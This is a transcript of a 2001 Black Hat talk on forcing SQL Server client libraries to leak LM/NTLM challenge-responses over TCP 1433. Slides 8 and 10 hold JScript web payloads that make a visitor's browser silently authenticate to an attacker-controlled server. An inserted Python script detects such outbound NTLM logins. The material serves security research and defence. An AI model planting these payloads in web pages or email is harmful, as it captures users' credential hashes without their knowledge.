
Grabbin’ Creds: Forcing SQL libs to deliver LM/NT challenge and response on the back channel…



Presentation Transcript


  1. Grabbin’ Creds: Forcing SQL libs to deliver LM/NT challenge and response on the back channel…
     Timothy M. Mullen, AnchorIS.Com, Inc. thor@hammerofgod.com
     Timothy Mullen, AnchorIS.Com, Blackhat Vegas 2001

  2. The Culprit: SQL2000 Super Sockets Lib
     • New functions in dbnetlib.dll!
     • Supports TCP/IP Sockets, encryption, authentication, etc.
     • Default library on workstations that have SQL2k client utilities installed. (MSDE as well?)

  3. Backgrounders…
     • SQL 7 also supported TCP/IP sockets, but only for Mixed Mode authentication (SQL maintained its own accounts).
     • Integrated Authentication (NTLM creds) needed Named Pipes.
     • Named Pipes required 139/445 open to the authenticating system.

  4. Backgrounders… cont.
     • Integrated Authentication has _always_ been the recommended configuration.
     • 139/445 has long been blocked at the router (if not, you are a yum-yum.)
     • Many server-to-server apps authenticate over TCP 1433 because it is “safe”.

  5. The Skinny
     • DBNETLIB now directly supports integrated authentication over standard TCP/IP sockets – default port 1433.
     • The LM/NTLM challenge/response pairs can now be sent out via 1433 (or other ports if changed).

  6. The Problem
     • Many routers, though specifically blocking 139/445, still allow established traffic out, i.e. 1433 outbound is free to pass.
     • Many have 1433 explicitly open for application support, server-to-server queries, etc.
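Slides 5 and 6 are the defender's detection point: if an integrated-auth SQL login crosses the edge on TCP 1433, the NTLM challenge/response follows on the same connection. The following script is an added example (not part of the original talk) that classifies outbound TCP segments: it checks for a TDS header (packet type 0x10 Login7, 0x11 SSPI), looks for an embedded NTLMSSP blob and reads its message type, and flags anything bound for a non-internal host on 1433. The internal ranges, the `TcpSegment` shape and the sample packets are all assumptions constructed for the example; real Login7 packets locate the SSPI blob via an offset in the fixed header and may be fragmented across TDS packets, which this signature scan does not handle.

```python
"""Flag Windows integrated (NTLM) SQL logins leaving the network on TCP 1433 (added example)."""
import ipaddress
import struct
from dataclasses import dataclass
from typing import List, Optional

TDS_LOGIN7 = 0x10          # TDS packet type: Login7 (may carry an SSPI/NTLM Negotiate blob)
TDS_SSPI = 0x11            # TDS packet type: SSPI message (carries NTLM Challenge/Authenticate)
NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
NTLM_NEGOTIATE, NTLM_CHALLENGE, NTLM_AUTHENTICATE = 1, 2, 3
SQL_PORT = 1433

# Assumption: the organisation's internal address space is RFC 1918.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


@dataclass
class TcpSegment:
    """Minimal view of one TCP segment (constructed shape, not a pcap library type)."""
    src: str
    dst: str
    dport: int
    payload: bytes


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def tds_packet_type(payload: bytes) -> Optional[int]:
    """Return the TDS packet type if the payload carries a well-formed 8-byte TDS header."""
    if len(payload) < 8:
        return None
    ptype, _status, length = struct.unpack(">BBH", payload[:4])  # type, status, length (big-endian)
    if length < 8 or length != len(payload):
        return None
    return ptype


def ntlm_message_type(payload: bytes) -> Optional[int]:
    """Locate an NTLMSSP blob by signature and return its message type (1/2/3), or None."""
    idx = payload.find(NTLMSSP_SIGNATURE)
    if idx < 0 or idx + 12 > len(payload):
        return None
    return struct.unpack_from("<I", payload, idx + 8)[0]  # MessageType is little-endian


def classify(seg: TcpSegment) -> Optional[str]:
    """Describe why a segment matters, or None if it is not SQL traffic leaving the internal ranges."""
    if seg.dport != SQL_PORT or is_internal(seg.dst):
        return None
    ptype = tds_packet_type(seg.payload)
    mtype = ntlm_message_type(seg.payload)
    if ptype == TDS_LOGIN7 and mtype == NTLM_NEGOTIATE:
        return f"{seg.src} -> {seg.dst}:1433 integrated-auth Login7 (NTLM Negotiate) to external host"
    if ptype == TDS_SSPI and mtype == NTLM_AUTHENTICATE:
        return f"{seg.src} -> {seg.dst}:1433 NTLM Authenticate (challenge response) sent to external host"
    if ptype is not None:
        return f"{seg.src} -> {seg.dst}:1433 TDS traffic to external host (no NTLM seen)"
    return None


def scan(segments: List[TcpSegment]) -> List[str]:
    return [finding for finding in (classify(s) for s in segments) if finding]


# --- constructed sample traffic -------------------------------------------------
def _tds(ptype: int, body: bytes) -> bytes:
    """Build a single TDS packet: type, status(EOM), length, SPID, packet id, window."""
    return struct.pack(">BBHHBB", ptype, 0x01, 8 + len(body), 0, 1, 0) + body


def _ntlm(mtype: int) -> bytes:
    """Minimal constructed NTLMSSP blob: signature, message type, padding."""
    return NTLMSSP_SIGNATURE + struct.pack("<I", mtype) + b"\x00" * 24


SAMPLE_SEGMENTS = [
    # workstation -> external 1433 with NTLM Negotiate inside a Login7 (simplified body)
    TcpSegment("192.168.1.20", "203.0.113.5", 1433, _tds(TDS_LOGIN7, b"\x00" * 36 + _ntlm(NTLM_NEGOTIATE))),
    # same connection, the NTLM response going out in a TDS SSPI packet
    TcpSegment("192.168.1.20", "203.0.113.5", 1433, _tds(TDS_SSPI, _ntlm(NTLM_AUTHENTICATE))),
    # legitimate internal SQL login: not flagged
    TcpSegment("192.168.1.20", "10.2.0.9", 1433, _tds(TDS_LOGIN7, b"\x00" * 36 + _ntlm(NTLM_NEGOTIATE))),
    # unrelated HTTPS traffic: not flagged
    TcpSegment("192.168.1.20", "203.0.113.5", 443, b"\x16\x03\x01"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_SEGMENTS):
        print(finding)
```

The check is deliberately one-sided: it only inspects client-to-server segments, because the leak the talk describes is the workstation's own LM/NTLM response leaving the perimeter. In a real deployment the same logic belongs in an egress sensor (or an IDS rule keyed on `NTLMSSP` within TDS on 1433), and the cheaper mitigation from slide 6 is simply to deny outbound 1433 to untrusted destinations at the router.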

  7. The Sting
     • Client-side ODBC connections can specify the target server, authentication type, and the library to use.
     • Web sites can request the client to perform ADODB recordset requests, as well as other tasks.
     • HTML email as well.

  8. Somewhat Lame Example
     • Web site with the following tag:
       {
         // JScript run by the browser: an ADO connection with Integrated Security=SSPI
         // makes the workstation perform an NTLM login to the Data Source over dbnetlib.
         conn = new ActiveXObject("ADODB.Connection");
         conn.ConnectionString = 'Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=pubs;Data Source=10.1.1.1;Network Library=dbnetlib';
         conn.Open();
       }

  9. Example Cont…
     • User is presented with the “This page is accessing a data source from another domain. Do you want to allow this?” dialog box.
     • Easily engineered around…

  10. Not So Lame Example
     • Let's try this one:
       {
         // SQL Namespace object: Initialize(appName, rootType, connectionString) with
         // Trusted_Connection=Yes triggers the same integrated login, without the ADO prompt.
         ns = new ActiveXObject("SQLNS.SQLNamespace");
         ns.Initialize("Grabber", 2, "Server=10.1.1.1;Trusted_Connection=Yes;Network Library=dbnetlib.dll");
       }

  11. What’s the difference?
     • SQLNamespace, SQL Distribution Control, and SQL Merge Control are all scriptable, and are marked _safe for scripting_!
     • Silently grab the creds for fun and profit!

  12. Live Demo
     • Don’t try this at home! Professional driver on closed course.

  13. Thanks!
     AnchorIS.Com www.anchoris.com
     HammerofGod www.hammerofgod.com
     Timothy M. Mullen tmullen@anchoris.com thor@hammerofgod.com